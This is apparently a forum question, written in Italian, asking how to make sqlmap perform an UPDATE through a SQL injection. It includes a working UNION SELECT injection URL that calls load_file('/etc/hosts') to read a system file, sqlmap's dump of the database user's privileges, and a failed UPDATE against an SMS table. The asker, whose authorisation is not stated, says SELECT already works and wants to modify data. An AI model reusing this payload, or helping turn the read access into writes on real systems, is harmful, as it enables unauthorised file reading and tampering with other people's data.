Come possiamo aggiornare una tabella tramite sqlmap? L'iniezione è come questa:
mysite.com/?menu=-8' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
load_file('/etc/hosts'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Ho un utente mysql con questi privilegi e ruoli:
[*] 'testUser'@'localhost' [17]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: SELECT
privilege: SHOW VIEW
privilege: TRIGGER
privilege: UPDATE
[*] 'testUser'@'localhost' [17]:
role: ALTER
role: ALTER ROUTINE
role: CREATE
role: CREATE ROUTINE
role: CREATE TEMPORARY TABLES
role: CREATE VIEW
role: DELETE
role: DROP
role: EVENT
role: EXECUTE
role: FILE
role: INDEX
role: INSERT
role: SELECT
role: SHOW VIEW
role: TRIGGER
role: UPDATE
ma non restituisce nessuno come risultato!
UPDATE SMS SET Message='This is for Test' WHERE ClientID='42';: None
L'istruzione Select funziona bene, ma mi chiedo se ci sia qualche possibilità di aggiornamento tramite sqlmap?